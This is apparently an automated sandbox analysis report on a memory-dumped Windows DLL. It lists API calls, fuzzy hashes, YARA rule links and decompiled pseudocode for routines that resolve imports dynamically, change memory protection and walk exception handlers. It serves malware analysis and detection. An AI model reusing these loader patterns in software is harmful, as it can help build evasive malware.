Part of subcall function 6DDC1146: GetProcAddress.KERNEL32(00000000,?), ref: 6DDC11A2
Part of subcall function 6DDC1146: GetProcAddress.KERNEL32(00000000,?), ref: 6DDC11B8
Part of subcall function 6DDC1146: GetProcAddress.KERNEL32(00000000,?), ref: 6DDC11CE
Part of subcall function 6DDC1146: GetProcAddress.KERNEL32(00000000,?), ref: 6DDC11E4

Part of subcall function 6DDC1CBE: memcpy.NTDLL(?,?,?,?,?,?,?,?,6DDC167E,?), ref: 6DDC1CF5
Part of subcall function 6DDC1CBE: memcpy.NTDLL(?,?,?), ref: 6DDC1D2A

Part of subcall function 6DDC1BAC: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6DDC1BE4

Part of subcall function 6DDC1020: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6DDC1059
Part of subcall function 6DDC1020: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6DDC10CE
Part of subcall function 6DDC1020: GetLastError.KERNEL32 ref: 6DDC10D4

GetLastError.KERNEL32 ref: 6DDC16B2

Memory Dump Source

Source File: 00000000.00000002.498510777.000000006DDC1000.00000020.00020000.sdmp, Offset: 6DDC0000, based on PE: true

Associated: 00000000.00000002.498499032.000000006DDC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498533432.000000006DDC3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498556653.000000006DDC5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.498571531.000000006DDC6000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: 6b8970ac47c3f4dd85a6f697445f812950ca1fd357b268705511f8658fdd0e74
Instruction ID: bf9db0415ae7299b8f2d99e52aecc9d64e36ff9e98751beaabfb7d7e00bebf3f
Opcode Fuzzy Hash: 6b8970ac47c3f4dd85a6f697445f812950ca1fd357b268705511f8658fdd0e74
Instruction Fuzzy Hash: E5112E76740322ABD721BBA9CC80D9F77BDAF48208F044115FA0197645D7B0E90687B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6DDFF2E7, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 6DDFF2FE
_wcscmp.LIBCMT ref: 6DDFF30F
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,6DDFF5AD,?,00000000), ref: 6DDFF32B
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,6DDFF5AD,?,00000000), ref: 6DDFF355

Strings

ACP, xrefs: 6DDFF2F8
OCP, xrefs: 6DDFF309

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: InfoLocale_wcscmp
String ID: ACP$OCP
API String ID: 1351282208-711371036
Opcode ID: 062f0ef13a9abf017221d8232374fb4bfd06f2d21ddaeefeb93d36a63c812c79
Instruction ID: 0fa1071696c72ea619910b506d118376557021c75430154f90f63f0ff9fde1a0
Opcode Fuzzy Hash: 062f0ef13a9abf017221d8232374fb4bfd06f2d21ddaeefeb93d36a63c812c79
Instruction Fuzzy Hash: 62019632205116FAD701BF28CC80FDA37ECAF05765B078065FA08DA152EB31D686C794

Uniqueness

Uniqueness Score: -1.00%

Function 6DDC1F0E, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DDC1F0E() {
				void* _t1;
				unsigned int _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t10;
				void* _t14;

				_t10 =  *0x6ddc4130;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6ddc413c = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 != 5) {
					L4:
					if(_t14 <= 0) {
						_t4 = 0x32;
						return _t4;
					} else {
						goto L5;
					}
				} else {
					if(_t3 >> 8 > 0) {
						L5:
						 *0x6ddc412c = _t3;
						_t5 = GetCurrentProcessId();
						 *0x6ddc4128 = _t5;
						 *0x6ddc4130 = _t10;
						_t6 = OpenProcess(0x10047a, 0, _t5);
						 *0x6ddc4124 = _t6;
						if(_t6 == 0) {
							 *0x6ddc4124 =  *0x6ddc4124 | 0xffffffff;
						}
						return 0;
					} else {
						_t14 = _t3 - _t3;
						goto L4;
					}
				}
			}

0x6ddc1f0f
0x6ddc1f1d
0x6ddc1f23
0x6ddc1f2a
0x6ddc1f81
0x6ddc1f81
0x6ddc1f2c
0x6ddc1f34
0x6ddc1f41
0x6ddc1f41
0x6ddc1f7d
0x6ddc1f7f
0x00000000
0x00000000
0x00000000
0x6ddc1f36
0x6ddc1f3d
0x6ddc1f43
0x6ddc1f43
0x6ddc1f48
0x6ddc1f56
0x6ddc1f5b
0x6ddc1f61
0x6ddc1f67
0x6ddc1f6e
0x6ddc1f70
0x6ddc1f70
0x6ddc1f7a
0x6ddc1f3f
0x6ddc1f3f
0x00000000
0x6ddc1f3f
0x6ddc1f3d

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6DDC1462,751463F0), ref: 6DDC1F1D
GetVersion.KERNEL32 ref: 6DDC1F2C
GetCurrentProcessId.KERNEL32 ref: 6DDC1F48
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6DDC1F61

Memory Dump Source

Source File: 00000000.00000002.498510777.000000006DDC1000.00000020.00020000.sdmp, Offset: 6DDC0000, based on PE: true

Associated: 00000000.00000002.498499032.000000006DDC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498533432.000000006DDC3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498556653.000000006DDC5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.498571531.000000006DDC6000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 5e4899918511eb82079ba63e78bab938f74152b07a43256264eb32dc2bde1232
Instruction ID: 851a9cc6396f8aa89d8e7d54aa966fc589daed20b46018190dd3ce72b09152e7
Opcode Fuzzy Hash: 5e4899918511eb82079ba63e78bab938f74152b07a43256264eb32dc2bde1232
Instruction Fuzzy Hash: FFF04F72694723DBFF11BFA8A8297943BBCA70B752F100215FA81C71C4D770A0469F49

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEFEBA, Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,6DDF3B82,?,?,?,6DEB1304), ref: 6DDEFEBF
UnhandledExceptionFilter.KERNEL32(?,?,?,6DEB1304), ref: 6DDEFEC8

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 902025f0ad9efc0c4a6a01841be3eb92145cca36e79d126314b7dfb1c643a5c0
Instruction ID: cfd6ed7a70e744bc60b39f170016f44246c32d06bafcad8c8dccfa6c140e470b
Opcode Fuzzy Hash: 902025f0ad9efc0c4a6a01841be3eb92145cca36e79d126314b7dfb1c643a5c0
Instruction Fuzzy Hash: 2FB09231048208FBDF002BD1E909B597FF9EB1A752F00801AF60D54091CB735430CAA7

Uniqueness

Uniqueness Score: -1.00%

Function 6DDC23A5, Relevance: 1.7, APIs: 1, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DDC23A5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6ddc4178;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6ddc41c0 = 1;
										__eflags =  *0x6ddc41c0;
										if( *0x6ddc41c0 != 0) {
											goto L60;
										}
										_t84 =  *0x6ddc4178;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6ddc41c0 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6ddc4178 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6ddc4180 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6ddc417c + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6ddc4180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6ddc4180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6ddc41c0 = 1;
							__eflags =  *0x6ddc41c0;
							if( *0x6ddc41c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6ddc4180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6ddc4180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6ddc41c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6ddc4180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6ddc4178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6ddc4180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6ddc4180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6ddc23af
0x6ddc23b2
0x6ddc23b8
0x6ddc23d6
0x00000000
0x6ddc23d6
0x6ddc23c0
0x6ddc23c9
0x6ddc23cf
0x6ddc23de
0x6ddc23e1
0x6ddc23e4
0x6ddc23ee
0x6ddc23ee
0x6ddc23f0
0x6ddc23f3
0x6ddc23f5
0x6ddc23f5
0x6ddc23f7
0x6ddc23fa
0x00000000
0x00000000
0x6ddc23fc
0x6ddc23fe
0x6ddc2464
0x6ddc2464
0x6ddc25c2
0x00000000
0x6ddc25c2
0x6ddc2400
0x6ddc2400
0x6ddc2404
0x6ddc2406
0x6ddc2406
0x6ddc2406
0x6ddc2406
0x6ddc2409
0x6ddc240a
0x6ddc240d
0x6ddc240d
0x6ddc2411
0x6ddc2415
0x6ddc2423
0x6ddc2423
0x6ddc242b
0x6ddc2431
0x6ddc2433
0x6ddc2435
0x6ddc2445
0x6ddc2452
0x6ddc2456
0x6ddc245b
0x6ddc245d
0x6ddc24db
0x6ddc24db
0x6ddc245f
0x6ddc245f
0x6ddc245f
0x6ddc24dd
0x6ddc24df
0x6ddc25c0
0x6ddc25c0
0x00000000
0x6ddc24e5
0x6ddc24e5
0x6ddc24ec
0x00000000
0x00000000
0x6ddc24f2
0x6ddc24f6
0x6ddc2552
0x6ddc2554
0x6ddc255c
0x6ddc255e
0x6ddc2560
0x00000000
0x00000000
0x6ddc2562
0x6ddc2568
0x6ddc256a
0x6ddc256c
0x6ddc2581
0x6ddc2581
0x6ddc2583
0x6ddc25b2
0x6ddc25b9
0x00000000
0x6ddc25b9
0x6ddc2587
0x6ddc2588
0x6ddc258a
0x6ddc258c
0x6ddc258c
0x6ddc258e
0x6ddc2590
0x6ddc2592
0x6ddc25a6
0x6ddc25a6
0x6ddc25a9
0x6ddc25ab
0x6ddc25ab
0x6ddc25ac
0x6ddc25ac
0x00000000
0x6ddc2594
0x6ddc2594
0x6ddc2594
0x6ddc259d
0x6ddc259e
0x6ddc25a0
0x6ddc25a2
0x6ddc25a2
0x00000000
0x6ddc2594
0x6ddc2592
0x6ddc256e
0x6ddc2575
0x6ddc2575
0x6ddc2577
0x00000000
0x00000000
0x6ddc2579
0x6ddc257a
0x6ddc257d
0x6ddc257f
0x00000000
0x00000000
0x00000000
0x6ddc257f
0x00000000
0x6ddc2575
0x6ddc24f8
0x6ddc24fb
0x6ddc2500
0x00000000
0x00000000
0x6ddc2509
0x6ddc250b
0x6ddc2511
0x00000000
0x00000000
0x6ddc2517
0x6ddc251d
0x00000000
0x00000000
0x6ddc2523
0x6ddc2525
0x6ddc252e
0x6ddc2532
0x00000000
0x00000000
0x6ddc2538
0x6ddc253b
0x6ddc253d
0x00000000
0x00000000
0x6ddc2544
0x6ddc2546
0x00000000
0x00000000
0x6ddc2548
0x6ddc254c
0x00000000
0x00000000
0x00000000
0x6ddc254c
0x00000000
0x00000000
0x00000000
0x6ddc2437
0x6ddc2437
0x6ddc2437
0x6ddc243e
0x00000000
0x00000000
0x6ddc2440
0x6ddc2441
0x6ddc2443
0x00000000
0x00000000
0x00000000
0x6ddc2443
0x6ddc246b
0x6ddc246d
0x00000000
0x00000000
0x6ddc247d
0x6ddc247f
0x6ddc2481
0x00000000
0x00000000
0x6ddc2487
0x6ddc248e
0x6ddc24ba
0x6ddc24ba
0x6ddc24bc
0x6ddc24be
0x6ddc24d2
0x6ddc24d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6ddc24c0
0x6ddc24c0
0x6ddc24c0
0x6ddc24c9
0x6ddc24ca
0x6ddc24cc
0x6ddc24ce
0x6ddc24ce
0x00000000
0x6ddc24c0
0x6ddc2490
0x6ddc2493
0x6ddc2495
0x6ddc24a7
0x6ddc24a7
0x6ddc24aa
0x6ddc24ac
0x6ddc24ac
0x6ddc24ad
0x6ddc24ad
0x6ddc24b3
0x00000000
0x00000000
0x00000000
0x00000000
0x6ddc2497
0x6ddc2497
0x6ddc2497
0x6ddc249e
0x00000000
0x00000000
0x6ddc24a0
0x6ddc24a0
0x6ddc24a1
0x00000000
0x00000000
0x00000000
0x6ddc24a1
0x6ddc24a3
0x6ddc24a5
0x6ddc24b8
0x00000000
0x00000000
0x00000000
0x6ddc24b8
0x00000000
0x6ddc24a5
0x6ddc2417
0x6ddc241a
0x6ddc241d
0x00000000
0x00000000
0x6ddc241f
0x6ddc2421
0x00000000
0x00000000
0x00000000
0x6ddc2421
0x6ddc23e6
0x6ddc23e8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6DDC2456

Memory Dump Source

Source File: 00000000.00000002.498510777.000000006DDC1000.00000020.00020000.sdmp, Offset: 6DDC0000, based on PE: true

Associated: 00000000.00000002.498499032.000000006DDC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498533432.000000006DDC3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498556653.000000006DDC5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.498571531.000000006DDC6000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID:
API String ID: 2850889275-0
Opcode ID: 4009e2dfc9d3bcc6c74861326b097b3896720bec5b000d9710888467a610056b
Instruction ID: 36ec0fc47c7cbecdc8b6764f4ed46e1c45405ab12574aca44d4eb64ccdfce3bd
Opcode Fuzzy Hash: 4009e2dfc9d3bcc6c74861326b097b3896720bec5b000d9710888467a610056b
Instruction Fuzzy Hash: 7961B630618607DFDB39EF68C89072A3BBDAB5A31CF20A529F456C7181E730D8828752

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF29A0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(6DDF298C,00000001,?,6DDFE7C2,6DDFE860,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6DDF29CE

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 661d771657a53f47a6a799952751bb0ab860e37eb5bafa8ee9a6685b315f3b02
Instruction ID: 68aa2476b9b6a42fe420666e601d331fefc791bd2a270a9d98038b82727387a5
Opcode Fuzzy Hash: 661d771657a53f47a6a799952751bb0ab860e37eb5bafa8ee9a6685b315f3b02
Instruction Fuzzy Hash: DFE04631180209ABCF129FE4CD45BA93BF4AB09325F058005B61C8B541C376A160CF44

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF2A26, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,20001004,?,6DDF5960,?,6DDF5960,?,20001004,?,00000002,?,00000004,?,00000000), ref: 6DDF2A4D

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: c5f1f3cbe77cae82e0d0a29054159e72046e0ba71af03c423532d565b29a567b
Instruction ID: f333409aa9af9cecd2b1c052f1d59fa5d0f631aeaa6ca1808572dbcbe85e4392
Opcode Fuzzy Hash: c5f1f3cbe77cae82e0d0a29054159e72046e0ba71af03c423532d565b29a567b
Instruction Fuzzy Hash: 14D0173240010DFFCF11AFE0E805AAB3FB9FB0A328B428405F92896520D732A520DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF3484, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(6DDECBFF,6DE19188,00000008,6DDECDD5,?,00000001,?,6DE191A8,0000000C,6DDECD74,?,00000001,?), ref: 6DDF3484

Memory Dump Source

Source File: 00000000.00000002.498599898.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 60bde3328f392b241dfa433c792f3e53dced1f9ee87172e460d596d7c5c09f90
Instruction ID: a7c258523cfd8c527330eea3082fbdb9e90bceba5d14b919fa9023b10918671e
Opcode Fuzzy Hash: 60bde3328f392b241dfa433c792f3e53dced1f9ee87172e460d596d7c5c09f90
Instruction Fuzzy Hash: BCB012B0301603478F090B39961430935F45B5D301305803E7003C1550EF20C420EF05

Uniqueness

Uniqueness Score: -1.00%

Function 6DDC2184, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6DDC2184(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6DDC22EB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6DDC23A5(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6DDC2290(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6DDC22EB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6DDC2387(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6ddc2188
0x6ddc2189
0x6ddc218a
0x6ddc218d
0x6ddc218f
0x6ddc2192
0x6ddc2193
0x6ddc2195
0x6ddc2196
0x6ddc2197
0x6ddc219a
0x6ddc21a4
0x6ddc2255
0x6ddc225c
0x6ddc2265
0x6ddc21aa
0x6ddc21aa
0x6ddc21b0
0x6ddc21b6
0x6ddc21b9
0x6ddc21bc
0x6ddc21c0
0x6ddc21c5
0x6ddc21ca
0x6ddc224a
0x00000000
0x6ddc21cc
0x6ddc21cc
0x6ddc21d8
0x6ddc21da
0x6ddc2235
0x6ddc2235
0x6ddc223b
0x00000000
0x6ddc21dc
0x6ddc21eb
0x6ddc21ed
0x6ddc21ee
0x6ddc21ef
0x6ddc21f2
0x6ddc21f2
0x6ddc21f4
0x00000000
0x6ddc21f6
0x6ddc21f6
0x6ddc2240
0x6ddc21f8
0x6ddc21f8
0x6ddc21fc
0x6ddc2204
0x6ddc2209
0x6ddc220e
0x6ddc221a
0x6ddc2222
0x6ddc2229
0x6ddc222f
0x6ddc2233
0x00000000
0x6ddc2233
0x6ddc21f6
0x6ddc21f4
0x00000000
0x6ddc21da
0x6ddc224e
0x6ddc224e
0x6ddc224e
0x6ddc21ca
0x6ddc226a
0x6ddc2271

Memory Dump Source

Source File: 00000000.00000002.498510777.000000006DDC1000.00000020.00020000.sdmp, Offset: 6DDC0000, based on PE: true

Associated: 00000000.00000002.498499032.000000006DDC0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498533432.000000006DDC3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.498556653.000000006DDC5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.498571531.000000006DDC6000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 8a528d1ed908dadf0c7206124eca8468b0d097461c95a5def7896bd65d91af6c
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: E821C7729002059BD710EF68C880A67FBA9BF49314F468168E9598B245DB30FA15C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1DE0E, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.498763329.000000006DE1B000.00000040.00020000.sdmp, Offset: 6DE1B000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 5fae02a688c6def1cb65f5416de29b39068c3855440d440b6df473d3e31d9c20
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 2C11D3777441019FD754CE59DCC0EA673EAFBE9231B25806AED04CB305DA39E842C760

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1E207, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.498763329.000000006DE1B000.00000040.00020000.sdmp, Offset: 6DE1B000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
Instruction ID: ef8b927577eb1d3092cfd61be34382b2650bfb0b7984288e9e2ef6db0c6512d5
Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
Instruction Fuzzy Hash: 6B01C43235C601CFDB05CB29DDA4D7AB7E4EBD6B28B29C07EE446D3B15D924E446CA10

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF2EBD, Relevance: 18.1, APIs: 12, Instructions: 84COMMON

Download Yara Rule

APIs

RtlDecodePointer.NTDLL ref: 6DDF2EC5
_free.LIBCMT ref: 6DDF2EDE

Part of subcall function 6DDEB190: HeapFree.KERNEL32(00000000,00000000,?,6DDF49A1,00000000,?,?,?,00000000,?,6DDECF78,00000018,6DE191C8,00000008,6DDECEC5,?), ref: 6DDEB1A4
Part of subcall function 6DDEB190: GetLastError.KERNEL32(00000000,?,6DDF49A1,00000000,?,?,?,00000000,?,6DDECF78,00000018,6DE191C8,00000008,6DDECEC5,?,6DDE17F0), ref: 6DDEB1B6

_free.LIBCMT ref: 6DDF2EF1
